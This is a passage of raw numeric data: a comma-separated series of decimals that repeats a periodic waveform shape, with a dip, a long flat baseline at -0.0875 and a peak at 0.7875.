0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 